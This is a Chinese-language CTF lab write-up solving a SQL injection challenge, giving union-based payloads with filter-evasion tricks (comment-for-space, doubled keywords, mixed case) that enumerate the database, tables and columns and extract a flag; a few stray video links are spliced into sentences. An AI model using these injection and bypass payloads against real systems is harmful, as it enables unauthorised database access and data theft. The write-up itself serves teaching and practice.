技术心得:实验室每日一题WP

简介: 技术心得:实验室每日一题WP

"

打开题目,直接受到物理攻击。看到网页左下角提示

于是尝试sql注入,/?id=1;得到回显,/?id=//代码效果参考:https://v.youku.com/v_show/id_XNjQwNjgyMTc5Ng==.html

1' ;无回显,判断为数//代码效果参考: https://v.youku.com/v_show/id_XNjQwMDM2Mzg2MA==.html

字型注入。

当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。

当输入的参数为字符串时,称为字符型。字符型和数字型最大的一个区别在于,数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。

尝试查询字段数,经尝试过滤了空格 or ,于是用/**/代替空格 和双写绕过。

?id=1//oorderrder//by/**/1得到回显

测试为3个字段数,然后查询回显,发现select和union被过滤,发现双写绕过不行,于是尝试大小写绕过

?id=1//Union//Select/**/1,2,3

发现2,3为回显位,于是查询当前数据库名。

?id=1//Union//Select/**/1,2,database()

得到数据库名 text

查询表名

?id=1//Union//Select//1,2,group_concat(table_name)//frfromom//information_schema.tables//where/**/table_schema='text'

得到flag,users

获取列名

?id=1//uNion//Select//1,2,group_concat(column_name)//frfromom//information_schema.columns//where/**/table_name=%27flag%27

id,flag

查询字段值

?id=1//uNion//Select//1,2,flag//frfromom/**/flag

得到flag

flag{You have successfully!!!}

下次可以尝试直接爆破数据库密码了


"
image.png
相关文章
|
移动开发 网络协议 物联网
STM32+果云GA6-GPRS/GSM模块+MQTT+HTTP协议连接中移OneNet上传GPS数据定位
STM32+果云GA6-GPRS/GSM模块+MQTT+HTTP协议连接中移OneNet上传GPS数据定位
1211 0
STM32+果云GA6-GPRS/GSM模块+MQTT+HTTP协议连接中移OneNet上传GPS数据定位
如何初始化PoolingHttpClientConnectionManager
【8月更文挑战第26天】如何初始化PoolingHttpClientConnectionManager
611 7
|
监控 Oracle 关系型数据库
"深度剖析:Oracle SGA大小调整策略——从组件解析到动态优化,打造高效数据库性能"
【8月更文挑战第9天】在Oracle数据库性能优化中,系统全局区(SGA)的大小调整至关重要。SGA作为一组共享内存区域,直接影响数据库处理能力和响应速度。本文通过问答形式介绍SGA调整策略:包括SGA的组成(如数据缓冲区、共享池等),如何根据负载与物理内存确定初始大小,手动调整SGA的方法(如使用`ALTER SYSTEM`命令),以及利用自动内存管理(AMM)特性实现智能调整。调整过程中需注意监控与测试,确保稳定性和性能。
849 2
|
网络协议 算法 网络性能优化
TCP协议基础
【8月更文挑战第18天】
165 3
灭霸打个响指的功夫,看懂Verilog多维数组【Verilog高级教程】
灭霸打个响指的功夫,看懂Verilog多维数组【Verilog高级教程】
灭霸打个响指的功夫,看懂Verilog多维数组【Verilog高级教程】
|
监控 Linux 数据中心
|
Java 开发者
综合案例:文件批量更名|学习笔记
快速学习 综合案例:文件批量更名
208 0
综合案例:文件批量更名|学习笔记
|
1天前
|
人工智能 运维 安全

热门文章

最新文章